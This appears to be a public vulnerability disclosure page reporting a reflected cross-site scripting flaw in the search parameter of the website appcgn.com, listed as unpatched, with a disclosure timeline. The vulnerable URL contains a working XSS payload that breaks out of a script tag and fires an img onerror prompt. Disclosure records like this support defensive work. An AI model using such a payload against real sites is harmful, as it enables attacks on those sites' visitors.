logo
DATABASE RESOURCES PRICING ABOUT US

appcgn.com XSS vulnerability

Description

##### Vulnerable URL: https://www.appcgn.com/?s=%3C%2Fscript%3E%3Cimg+src%3Dx+onerror%3Dprompt(%2FXSSPOSED%2F)%3E%22%3E%3C/script%3E%3Cimg%20src=http://i.dailymail.co.uk/i/pix/2016/08/11/17/371D509C00000578-3734919-Speaking_as_she_showcases_her_incredibly_toned_body_in_a_new_bea-a-15_1470931763257.jpg%20onerror=prompt(/XSSPOSED/)%3E ##### Details: Description| Value ---|--- Patched:| No Latest check for patch:| 28.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 42898 VIP website status:| Yes Check appcgn.com SSL connection:| (Grade: F) ##### Coordinated Disclosure Timeline: Description| Value ---|--- Vulnerability submitted via Open Bug Bounty| 14 February, 2017 22:06 GMT Generic security notifications sent to website owner| 14 February, 2017 22:08 GMT Notification sent to subscribers (without technical details)| 15 February, 2017 02:17 GMT Vulnerability details disclosed by researcher| 21 February, 2017 22:15 GMT